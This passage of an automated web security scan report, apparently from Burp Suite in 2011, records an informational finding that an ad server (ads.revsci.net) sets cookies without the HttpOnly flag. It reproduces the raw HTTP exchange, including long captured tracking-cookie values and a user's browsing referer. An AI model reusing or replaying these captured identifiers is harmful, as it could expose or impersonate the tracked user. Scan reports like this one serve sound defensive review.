JFtJnrSudJUxkSp36hMpMqoyWjYf/0Dzxx8sSoHwbQLc7K4XYWzwFKXoqtXqULfas/iA=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpj7P+LBAm++DA1mQ19Ktk0xHtNbUdnsuhledavN12kASJwVH5lHOqeC4o2fHI9QkQeon8inPHPsPHufQb0id4nnMJw2upjcbtYuTDvN446mDNk0rjriNSbgDKZc06/pZLd8/z5IM1+qarydvJImOaUCavF5tQ+vJTy0vmLIKK5JakfcZvZ6vY5TRBbUhvbhTFBLWagpBIVk9PAmF2iRJOeh7n11Dcn8bkilhzvJuOwSrWjLV4c1dKSmGQXQgUCCrlrfg5dBoy/uKX5D/DErzUQPBw5wzlcHY0pwcQ4ohqHveeUO1fCklYt3yNLi8Ih4fiXA7KtiQmAv01haIfBqzbc3dy7UBOXBFA5UQx+zZY6T+r0AEWHCqu9zrcpE/K+dhafAfZdl6F9XwAK29pKStK8Vmo/hIZWj6P4pKDIwHnsIzs/CsI6oGdONCs57jOPg55C+8Eo4w2eN8X6XGvloOwC16CAbvKgsBHdOES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafiVSeTecIJRVt18r+Pf6AVQ9smmgMCZPjqwiXHhyXFqLJwepQkHnViNF27BPMR76afEDXmQK4X5YtD+7lbiGoEtKEsos76lXkFDeXHHplOgEvw0R+YSyi6fZVTgUbyYjzKicP8ItTRSjGP+9wmw4+6IWPluELGIVZSpte+L2p8Ak8G+6f39QiQNX9sYMuyPRDbuBHfKyeNWHJBFhuqK4/xZ7D/CTqehq/ghqdhipMBw5Tkr8mdUR/zxczguAqS4lU2jGjyE9g5myCi05INSSRNE5L4DNh54JKfld0ePji0KKkmwnQEKhnIFcxkTlb237bhRQDP++3zP1j2hiLU3mg4xi1Bay7LsKGEYilyYgtuJxssb25KbKk0l2Nx+BftGsREymmYzUPlB6j58myYGRehdpGh0wJvXFJhEomvMt3+RVVtU/Hs/dJeH/HekE15CjTKMwIovoWyWLWkLk/6AzLofDM76Xj3/75JEbK9bptsRjxMDFAem9ySqV4jf0esg7pJ4iPlT5pMZ10V4CW1LSJQcWkybORfD0N5UTmssjs9H6zArVaijt0fVauRh7dRVBdULPsaJ7riVOn6Uyy3PpnD9ux5E93rqsEK1x7fbJO18nv264KJ7YWZM5gXP2LEWHxvabbxbwwGJ1QhIMhDB0OoWtqmkDKiV/MucnamXFEmet8G/Cjst1gkpmYPuG6pBgUPehivSI0fOzA0wV/YCP1uYirYyEalVKutJsu2eWT6Je8BzKdbq10UjW6IpkVn4Go3iH0RzBFoGh24tA44C3aKTJa/2frujwGy2nzvvlF0sL6Rj1PGg46xmLjjYE5SjtBW0D/I+k61vl+3uQyzZb33wWkGruFU4eK51kxOG6IX6C3L2EZDPaFw5tQnQjHUEIn0UPw/CZ7yH+a0h5BL5t32WMOXQTwq/Vl4lnroXyo6Vhf1SzulnavN4Twzu12B47v"; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ8U7xE84mx8cR/xmi3McKUrpVsIwOgHBRuY4DkmM2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oL6zR/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkcZJg/g==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xqR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TX2x="MLsXrqEO5ihr4JB0esFCP3iNF+pqmlub45YPlOnX049VyMgTcqeWbmnipeB/JrGlJxU5Qewy9Qy2xGUW1fNZS3kgjaogVEgRJznRYvE/JCag2Zhy6/wqe3cIKLE2F4M5TRkHAwa4UhPEVrUN6TcHwqPWgepSOQrGAMWEKXgI9aveV2o/GKg/ikUWZjkM9grghNsod56+40pt0DeP3Sd6CuqR8ruJunOVms0ndtVb56pTF3/HT8AO9lmyq+AMe5jCaXvQksjDJ4VC0lmY7unMPsDKbVmJUsKOb8v47dLpuyu6az+axXednbh2eR3WtwuljO3JdXEPiX2V4wjTz4W7NmCNAMSMId/sniOHHhRcjK9XkuTEEoHl7vuHZ1Cbo2hjlBeXj2B0v1V8F4+hXYuCP4EhlmxFYNCRwiJ0EJPQLmGPpFxsINKEe28fB0FZdc3/eWHMXvBpoBl+ZHXtsYYnorsWC3MqdMRsWIySLSCcOwJnn79Fau6gNDZnPubc0PZB/ls5Z1iUwyOUu7LJZczu78pm2ChSJOCOzkxlPYCEbZyU6vBm+BalK/Pji05l60F2I7Ok/QBlq/scbqnVAmUgEgs2bHZJsiOBoOgzZwLVOSOgmhj3ZIMtuQSSmMTwAYLYnhDwGOJDHITdE4WOuAahUOZ7+UczOYlEyqFQgb1J5xuiZ/4jixcblsFW1MDHuy1RdUOlLFkACldJmAsrxuhKQTznkR2N1rGV85nMgZnlyagVMdufeF+qIv5p3gGebL7zyrSl/lEqwDP4XDOMetQ+Neg3AiuVfUJvFlFNKkkVzA9x0P2IP38RiV/PbdAWB7nT3E+S7HZH4omgJh+DIF3t/+gIKIpTcKQhEvV78bZFFGzmI2yntSoW8Hdx4ivfk5+6WM9sl16wegwKjXMncglzHEnQRSvXvBIFFZ9usXyyqs8KgvqW6CBP/g30+hZfR6iS+tmplYgJPY4Yx66Hl3F5RihsK7f80BTu5iNJwhoA39T+xU/T7C5INS6fzjAj1UHmVY1vpvDzf6ukd8fRlASqp6GN0oAKlEPaZY7GPIc="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM1IzlHMAYY1A3HkAz1jyt3+1Rp5ZIgoudOS17C7yspOfwTPCNo1WG46bHYwCUC8Wl4wOOguOEurHKK5ymr4fckNKrCI/THbZusvT5koQZT2sgHJub8zAl8yeylWtCht+vqujN0CpLrK5Tb2vMbgRJvPHqMnm0VtLZDe43ydtJA4M05NTSETlisaIkMM/QOAsK+xFPZvnV/pfa5TRBbUukihA5ZLSa46K3CuW8xC3kpZNoWwdNV3yYmD8B8maDBHhbaYLm5/P02m612E1eGsoE97abrfw59xky8uJvZD0i8e3kCU/2FJnVmWnFnXpoxPT7es73wF1fCklA9xyNLi8Ih4fiXI6qtwZkH/k1iaETBrRbU3dybWFOLhNA+UIJ9dbAxlqUWnaWHilccc8JOE+ayRhKJFkoXh6E93wHyutpKStK8FmoxhIJQj7mgJOHLwH7M+zDfqsN6VeXO7UdKtgs3/Hm9LBSRuY/rmLTta203lnZYmWArQ5o7m8D+D/L5ZJcLgfsVYk+qKg3NzYC9tSmkw4omQ4OHqqs+BLAbUpya9N3VPWK1On1xQ3geEPdqDYF+uzceqtbOgWCsm31fyWV0qru7N3uKuHhqBpEL3Q+XaQUKxPc3BnNkF3jjSqwKQfPQ9Va2ptUui3c95cJae4XzS5rw7p3T6njaQPraWTpGTUqa4FFbuSqyUgnm5tHE7IROv7SIqI/WHR6k6AoLuNw4C/G4XA/5o8Q8x69IDZCWryuvSsN8TcJk6/5yjDOK5L9XZH0LqgSL+LYAGvnexRIqOvM/bZ0NFDx3hBkbPmeIvPXqWY+BMRV4Ql/ZJbcTYD92zqCFgBQxGKNSaNS4eWlv5+TzDLCmL5oiWg2NWo0gsP6/az/jA/a8mx9sRhwx99RdFP2VLI9rT690NKMJbPxh3Js4WouDskrJLxgvE8DgXWmUbopc6NOwyrgScDE7Fa+41sZcfA7Kvo/2kwxKPITepHYKgn/YWAwat43+Je5lbKm4oGGz8lIebZ/pSa6rYtmjBYvM4FqvfQpvwd/ryRC2ULgCpmdMLyxtvVYoYul+rddV9Us5XMBNPBQJNRgPlWvL544A6ioDWszv97zpIYHRVPm/YNfvQFhM0+bDBi9cPOGIOSSh008PYUZptfdE68d/XznQDJe3vt2BTT8Cfi7Ww1c7BSfIjoUwgjXjO94RjOQwIt2417qBxKEhQ6XcrE9+TixRqfjrLMtJGUhqC6AOjQVLtPkFdgLBRk0KBgXJ7ITEMFxGo22bjDupzkfdAYIKgqZHvHlu3D1XbEPVy2TYGogy8zL2qgodd4acPkIUxaNnO4+R6D0cG6+5k3HMVIanTW5JY/4yZUr5L8CeFqUc5MyhwDGr8YDHFI6MygEvKh4QQkeR4dF/Q8yimeh+7Oj+JuRw6OHK3iKIKTExLmGkMuPSOZ0jZEVLHC0VyIj+rmC9jqxRv1E7SydLJMlLbkba/zFi5zeeuf6foNmAo3U1CxM0a775iAQRqN1M5k5P3vNgqvutTIE9NeCxGjOzzfw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:44 GMT

GIF89a.............!.......,...........D..;
10.18. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wuF1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wuF1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dJdc="MLsXrqMOJjhroJB0OsFGPzgTQa5gk449UdSbypMOpdiJuQ8uZnyT6WZcebgrPoqwK7j54RnOdugyEJFu1u1/kxt/eHbh4iCmvSB8fik1JCbILFQwNyRB3XmZYv61AYwLDVmz3VsSmUe+fB+yP8yzNYmzFkyZrPC7z9K8YXjI963e66jPe6k/CoS4z8uWeuITGVaJoW3ZWbeBoDt2e9DmCkwiTsAu8BSlsvzgbzl9X0CKuQcYs+2vGi8KyNxZlNV/O3vQvk2KoKo/gmQnrkZg2FK0VOC45kZgVoz4gqDmiTyD6LoDLxOtAteOd0oEU38dx/0UsrqqyV8FwUnzTGiXEWBNzCaQoJc5yD4ZBJ2IbZ3w+GMFlCaS4bFeiqD5Uu4WrIJFgGCIP1V8l/sjUmvXF7kq6Ts+fyjsBk8zboXi5TdzKE7BIFHru2Tv6T88c6O9VWmg/5AxIK7ZKXryudYKYivLEGZ0ftIYIZG7USvwpiNwby3j026bB7RioZiokWlLyPwo5+CAeC/0sx5hYexS13hnRwPMINg/iiRl37OsbwyWSVpmLt6GJ0ueM3/lqli6ISMYnX9lmLUtaBXaM3ygtFwr7OJR6iahiQA2mImPSvkfiBKekT+Is7a1kjqDoqOb1KCZYp9TiGwkKq3V7Oo6VzUL6X5MPem9oO0siqzO7PmC3dykx69lQmZU6zoNGApOTsoKL9DwBEsoqNkIh4aXsB2Ygp6ipLHeMjuUE2wQpST5bYoHySP93cix8e8Gb5lV5F0zi2fBN33pN0Z4lGISYgAURmRYWoMLNIT6wwrGEZwT3tYqTQrQNx8wv38HHv0hwPiUL8IhJAd9OePqfNTjyQgaR2VZaa/rcO15+AuggRh/VXH0/vUEp8zDk1/b87FqYm7vacQYgw0jh70VRYurH4PuecWUEnVerH0qcfc4YqB/gbVhMFFF84FMttNg1o/KQK8Xuar8A4OQ5KildhHirlMV6qQghu5Om+C5gLROQlAjyIhuheNySsXz3FFVpZmVI0j1PyhkQwl8vDaYyqa3sE+32CR8"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpj7P+LBAm++DA1mQ19Ktk0xHtNbUdnsuhledavN12kASJwVH5lHOqeC4o2fHI9QkQeov8FSjRptD7ENTZzS+tm+o7g1+4q2ipO6FebBr4lX9JqakD06xSknvL52fJuOnqMnmUVtbZDezFLZDkQ9/DOcJVmus0zFa8R4eGBZWoP51vdnmVwXUWy2AzzrS3LC/KeUSBZa17NuW8wA7lJfNqWQdNV06Z479d+6FpyKgl1Hq2XjxlJ1jOqjAs1WA1dOdiAIQwLbq3YvJx3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL1wdlfCMgFvoSIbnMIU57JYoUftImTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nELrmFh+jD84pvE1zt38WPal3ooNbYubn6Gn6tNGszfofAmyosRDfqsN6xGEQBrpVuB7EfC1mMrWQQm07FAtrYhxV9jQPwF8aAzKS57OagwgoEgSWJac4EL43S44ef75AQMhog8R/Pbu0AqaCZyqSzfFJo37W/WnSakK60MhraaUHbB845TFfFuKnF6d1KnlacwSiwYA4zSViHcP6ulEzTa2oAJJBpaf86mV/36OOxQ0C06BBrl3U3FaMUccpgDS4Q6g85h8LjjPuJ5HD9lRQdGnciFJst2iIODuspDiNNQn53F37Ivg6K3BHkEYUvP8DjelaXuskVdPwcX2N1TfClGnCAS6cYQQECmKkEoV2Ty5ma1uCIeUwK/N0b9Nw80EpBMjmz2PF81rbW1LZR8Yrr50OIbx0E38b3QIYtaiQ2HH5TaVYZ38N5Be6eCj5Q7QpcoPj5ERI0sgXD6QKCSwduWmd0RV+fSV2TkbCTv+pnupeZ/EjnilqyR2yvHw6RMR0Bq3qEoPosr7iZUc//XDs7ZXY9WWcbNbUCrAvKfBaQrg0Vc6Qi97aI3G1N/kNvNpKTN/23K8u93rljutE4/CsbGAj8f7WMmbTOIMjkFV+rmcEcrgDHUZj8EV4wcvuoVrfNQkocxZzCkctye0KoRoJIKX5KRQqqUzeq06HfHZGcVhuvF3BKdMM/Fjmsszs9H6zArVaijt0fVauRh7dBVBdULPsaJ7riVOn6Uwy3fpnD9ux5E9H7qsEK1h7fbJO18nv26wKJ7YWZM5gXP2LEWHxvabbxbwwGJ1QlIMhDB0OoWtqmjDKiV9MuMnamXFEGet8G/CDst1gkpmYPuG6pBgUPehivSI0fOzA0wV/YCP9qYhrYyEalVKutJsu2eWT6Je8BzKdDq10UjW6IpkVn4Go3iH0RzBFoGh24tA44C3aKTJa/2frujwGy2nzvvlF0sL6Rj1PGg46xmLjjXk4TjthW0D/I+k61vl+3uQyzZb33wWkGruFU4eK51kxOG6IX6C3L2EZAPZFpFvij+HpKJotZx5w6ko9LWWaFIAAC2R/IHJ1W5UMBBCdaqSbYc7M/Frlfg0k+l6JH8QfxsE/FY8E"; Version=1; 